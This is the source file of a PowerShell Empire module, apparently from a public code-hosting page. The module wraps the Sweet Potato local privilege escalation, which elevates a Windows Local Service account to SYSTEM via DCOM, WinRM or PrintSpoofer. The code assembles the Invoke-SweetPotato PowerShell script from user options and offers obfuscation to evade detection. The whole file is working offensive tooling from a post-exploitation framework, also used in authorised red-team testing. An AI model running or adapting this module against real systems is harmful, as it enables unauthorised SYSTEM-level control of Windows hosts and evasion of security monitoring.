lib/modules/powershell/privesc/sweetpotato.py - powershell-empire (73e0017)

sweetpotato.py @73e0017 — raw · history · blame

from __future__ import print_function
from builtins import str
from builtins import object
from lib.common import helpers


class Module(object):

    def __init__(self, mainMenu, params=[]):

        self.info = {
            'Name': 'Sweet Potato Local Service to SYSTEM Privilege Escalation',

            'Author': ['@_EthicalChaos_ (@CCob)', '@kevin'],

            'Description': 'Abuses default privileges given to Local Service accounts to spawn '
                           'a process as SYSTEM. Tested on Server 2019 and Windows 10 1909 (Build 18363.1316). '
                           'Run a Powershell stager or your own command.',

            'Software': '',

            'Techniques': ['T1068'],

            'Background': False,

            'OutputExtension': "",

            'NeedsAdmin': False,

            'OpsecSafe': False,

            'Language': 'powershell',

            'MinLanguageVersion': '5',

            'Comments': ['https://github.com/CCob/SweetPotato']
        }

        self.options = {
            'Agent': {
                'Description': 'Agent to run on.',
                'Required': True,
                'Value': ''
            },
            'Binary': {
                'Description': 'Full path to the process to spawn. Default: C:\Windows\System32\WindowsPowerShell\\v1.0\powershell.exe',
                'Required': False,
                'Value': ''
            },
            'CommandArguments': {
                'Description': 'Arguments to pass to the process binary. Default: No arguments',
                'Required': False,
                'Value': ''
            },
            'ListenPort': {
                'Description': 'Port to host internal impersonation server on. Default: 6666',
                'Required': False,
                'Value': ''
            },
            'ExploitMethod': {
                'Description': 'Exploit mode: [DCOM|WinRM|PrintSpoofer]. Default: PrintSpoofer',
                'Required': False,
                'Value': ''
            }
        }
        self.mainMenu = mainMenu

        if params:
            for param in params:
                option, value = param
                if option in self.options:
                    self.options[option]['Value'] = value

    def generate(self, obfuscate=False, obfuscationCommand=""):

        moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Invoke-SweetPotato.ps1"
        if obfuscate:
            helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
        try:
            f = open(moduleSource, 'r')
        except:
            print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
            return ""

        moduleCode = f.read()
        f.close()

        script = moduleCode
        scriptEnd = "Invoke-SweetPotato"

        for option, values in self.options.items():
            if option.lower() != "agent":
                if values['Value'] and values['Value'] != '':
                    if values['Value'].lower() == "true":
                        scriptEnd += " -" + str(option) + " " + str(values['Value'])
                    elif values['Value'].lower() == "false":
                        pass
                    else:
                        scriptEnd += " -" + str(option) + " " + str(values['Value'])

        if obfuscate:
            scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath,
                                          obfuscationCommand=obfuscationCommand)
        script += scriptEnd
        script = helpers.keyword_obfuscation(script)

        return script
Tree @73e0017 (Download .tar.gz)

sweetpotato.py @73e0017 — raw · history · blame
